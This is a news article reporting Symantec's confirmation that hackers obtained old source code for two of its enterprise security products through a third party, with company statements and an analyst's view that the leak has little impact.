Security Experts:

Symantec Confirms Hackers Accessed Source Code of Two Enterprise Security Products

On Thursday evening, SecurityWeek and other news outlets reported on news that hackers claimed to have accessed the source code to an unspecified version of Symantec’s Norton Antivirus product. It turns out that the hackers did get their hands on some code, but their claims are off a bit. Norton is a consumer-focused product, and Symantec has confirmed, that from what they have seen thus far, the code that has been accessed by the attackers was from their Enterprise product line.

In this case, Symantec confirmed with SecurityWeek early Friday morning that the products in question are Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2, so this incident did NOT involve its consumer products which are “Norton” branded.

Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2.While many would expect the “FUD” factor to kick in, its important to realize a few facts. Symantec updates its products on a “.1 basis”, and its Endpoint Protection product is now at version 12.0 and 12.1. According to a Symantec spokesperson, “SEP 11 was four years ago to be exact.”

In addition, Symantec Antivirus 10.2 has been discontinued, though the company continues to service it.

“We’re taking this extremely seriously and are erring on the side of caution to develop and long-range plan to take care of customers still using those products,” Cris Paden, Senior Manager of Corporate Communications at Symantec told SecurityWeek.

“It’s also important to bear in mind that this is not a virus or false positive. The products are not broken. They perform just fine and work just fine.”

Unlike the RSA breach when hackers penetrated company networks to steal confidential data and intellectual property, Symantec confirmed that its systems had not been breached. “Symantec’s own network was not breached, but rather that of a third party entity,” the company said in a statement.

The hacker group assumed to be responsible is operating under the name Dharmaraja, and claims it found the data after compromising Indian military intelligence servers.

Subscribe to SecurityWeek

“We are still gathering information on the details and are not in a position to provide specifics on the third party involved,” the company said. “Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time. Symantec is working to develop remediation process to ensure long-term protection for our customers’ information,” the company said in a statement. “We will communicate that process once the steps have been finalized. Given the early stages of the investigation, we have no further details to disclose at this time but will provide updates as we confirm additional facts.”

Rob Rachwald, Director of Security Strategy at Imperva shared some comforting advice when news of the possible source code exposure was announced. "If the rumors turn out to be true, the implications of the anti-virus code leakage will not keep the Symantec folks awake too late at night, and certainly not their customers," he said. "After all, there isn’t much hackers can learn from the code which they hadn’t known before." Why? "Most of the anti-virus product is based on attack signatures," he said. "By basing defenses on signatures, malware authors continuously write malware to evade signature detection."

"The workings of most of the anti-virus’ algorithms have also been studied already by hackers in order to write the malware that defeats them," Rachwald added.

Symantec also highlighted that it distributed 10 million new signatures to respond to new threats in 2010 alone. The code in question is four and five years old and has evolved and changed significantly over the years.

More information from Symantec is expected Friday afternoon.